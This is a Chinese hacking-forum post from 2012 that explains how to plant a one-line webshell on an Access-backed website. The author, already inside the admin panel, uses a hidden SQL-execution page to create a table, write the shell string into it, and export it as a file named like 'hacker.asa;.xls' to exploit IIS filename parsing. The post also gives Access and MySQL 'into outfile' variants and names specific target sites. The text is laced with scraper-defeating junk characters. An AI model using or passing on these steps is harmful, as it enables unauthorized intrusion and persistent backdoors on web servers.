找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1962|回复: 0
打印 上一主题 下一主题

ACCESS执行SQL命令导出一句话SHELL

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:53:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好不容易进了后台,发现啥上传啊。备份啊多木有。
: s* D1 R5 M8 o. U* G& Lwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的, i+ e# R. J7 f
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
1 T7 F# g, x0 |) [9 l然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:. O6 t5 v! R( H/ b* P/ b' C
1.create table cmd (a varchar(50))1 b# ^" w$ R5 Y# T
2.insert into cmd (a) values (‘‘)( }& e; }; r# @6 E; }1 z7 O! E1 R
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd0 j1 s2 v: f& y" R; s1 V
(把表cmd的内容导出为物理路径的一个EXCEL文件)
5 ^# u0 Q2 n5 D1 M# W' n- X& g4.drop table cmd: v0 f( G/ g, Z. Y$ i
利用IIS的BUG成功拿到了WEBSHELL。' P) C, P& Y+ q  ~' R  Y) X
5 X2 g; H% R' y# q$ D
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
1 y5 \; a. d$ W# q0 t( L: V8 q- `7 z" J+ A* u3 w7 {
  SQL语句意思解释:8 w3 S) P. I2 b0 q. _" C7 [( ]2 P: y, A
  第一句/ ?) v& Q3 [  a- n2 y5 d# X
  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50' u9 X4 ?' }5 h2 k. o( `: h: H7 n
  F9 P6 \2 V" G% z% l
  第二句5 T8 ~0 C8 ^  e/ m; V, D
  在表cmd的a字段插入一句话木马
+ v( D* Z6 ]; G" D# F! v; e8 S# k  第三句  t1 c4 J% r7 v' X" R+ x" C" y
  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
6 I8 M. S4 t% b- j6 b3 f
: T+ |2 j3 w' P5 v9 R# w/ U5 ^" G  第四句  n- d3 z- i; w8 I) P2 _5 Y
  删除建立的cmd表
2 B, x, j: M; }) ]8 o
2 c. K2 z+ o- h& \- a! Q* R  以下内容为测试:: r: A/ g0 `- _, `% L5 m* n, M
  Access利用后台SQL执行命令功能导出WebShell:) S2 ]' @2 _" \1 h  I
  这个更简单:+ E# G0 l/ d" M( o( R
  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
- k. ?# B8 u( O; f. V* M7 t  或者
4 J) q) |9 L7 r2 A) c  A/ |  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
- ~* S' V  [" d  W+ }1 F
( h; J0 V+ a1 ]4 l  后台有执行SQL语句功能(vote为已知表段)
- A. Y  s, b0 h# t: W6 k  希望对大家有所帮助拿shell的又一个思路% X: |7 r( m) j% F6 B; A5 ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表